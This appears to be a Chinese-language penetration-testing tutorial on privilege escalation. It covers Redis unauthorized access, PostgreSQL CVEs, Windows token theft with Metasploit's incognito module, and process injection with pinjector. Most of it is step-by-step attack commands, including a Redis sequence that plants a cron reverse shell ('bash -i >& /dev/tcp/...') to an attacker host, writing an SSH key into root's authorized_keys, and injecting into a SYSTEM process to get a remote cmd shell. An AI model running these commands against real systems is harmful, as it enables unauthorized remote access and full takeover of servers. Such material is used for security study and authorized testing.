权限提升-Redis&Postgre&令牌窃取&进程注入Redis:
利用计划任务执行命令反弹shell:首先利用redis未授权访问漏洞或者已知密码,登录redis服务,然后在root权限下利用redis内置命令进行反弹shell先在自己的服务器上监听一个端口 nc -lvnp 7999 然后执行命令: root@kali:~# redis-cli -h 192.168.63.130 192.168.63.130:6379> set xx “\n* * * * * bash -i >& /dev/tcp/192.168.63.128/7999 0>&1\n” OK 192.168.63.130:6379> config set dir /var/spool/cron/ OK 192.168.63.130:6379> config set dbfilename root OK 192.168.63.130:6379> save OK 写ssh-keygen公钥使用私钥登录:
利用条件:a.Redis服务使用ROOT账号启动b.服务器开放了SSH服务,而且允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务器操作流程:Copy首先在本地生成一对密钥:root@kali:~/.ssh# ssh-keygen -t rsaCopy然后在redis执行命令192.168.63.130:6379> config set dir /root/.ssh/ OK 192.168.63.130:6379> config set dbfilename authorized_keys OK 192.168.63.130:6379> set x"AAAAB3NzaC1yc2EAAAADAQABAAABAQDKfxu58CbSzYFgd4BOjUyNSpbgpkzBHrEwH2/XD7rvaLFUzBIsciw9QoMS2ZPCbjO0IZL50Rro1478kguUuvQrv/RE/eHYgoav/k6OeyFtNQE4LYy5lezmOFKviUGgWtUrra407cGLgeorsAykL+lLExfaaG/d4TwrIj1sRz4/GeiWG6BZ8uQND9G+Vqbx/+zi3tRAz2PWBb45UXATQPvglwaNpGXVpI0dxV3j+kiaFyqjHAv541b/ElEdiaSadPjuW6iNGCRaTLHsQNToDgu92oAE2MLaEmOWuQz1gi90o6W1WfZfzmS8OJHX/GJBXAMgEgJhXRy2eRhSpbxaIVgx" OK 192.168.63.130:6379> save OK之后直接使用公钥登录即可低权限写webshellPostgresql:cve-2018-1058,cve-2019-9193令牌窃取:进行远程过程调用时请求提升权限,然后调用它从而生成特权安全令牌以执行特权操作。当系统允许令牌不仅用于进程本身,还用于原始请求进程时,漏洞就会出现。适用于win2008以及之前的版本。在msf集成有exploit,可以直接利用。use incognito #进入incognito模块list_tokens -u #列出令牌impersonate_token "DESKTOP-RMP8TTT\test"进程注入:每一个进程运行时的用户名(权限)不同,所以可以利用将进程注入到拥有高权限的进程后,以高用户权限执行。适用于win2008之前版本,不包括2008。
注入到system用户的进程,当管理员账户或其他账户注销后,后门仍然存在。可以理解为将pinjector注入到其他用户的进程里一起运行,进而同时拥有了对应的权限。
攻击过程
使用工具列出当前操作系统的所有进程
pinjector.exe -l
可以看到不同的进程对应不同PID和用户。
执行pinjector.exe -p 600 cmd 2345注入进程pid为600的进程,使用端口2345返回cmd,执行成功后在任务管理器里并没有多出进程。
使用kali的nc 192.168.70.135 2345
反弹shell并提权为system。
Windows2003&10进程注入提升
进程注入提权是本地提权方式的一种较为老的安全技术了,利用的是注入进程的所有者实现权限共享机制,这类技术主要利用在windows2008之前操作系统上.所以我们需要学习后续的本地提权更多的手法才能有针对高版本的系统。
pinjector进程注入工具针对-win2008以前操作系统
pexec64 32进程注入工具针对-win2008及后操作系统
本文介绍通过Redis、PostgreSQL等服务的漏洞进行权限提升的方法,包括利用Redis服务反弹shell、写入SSH公钥直接登录服务器、利用PostgreSQL漏洞及令牌窃取、进程注入等技术。
440

被折叠的 条评论
为什么被折叠?



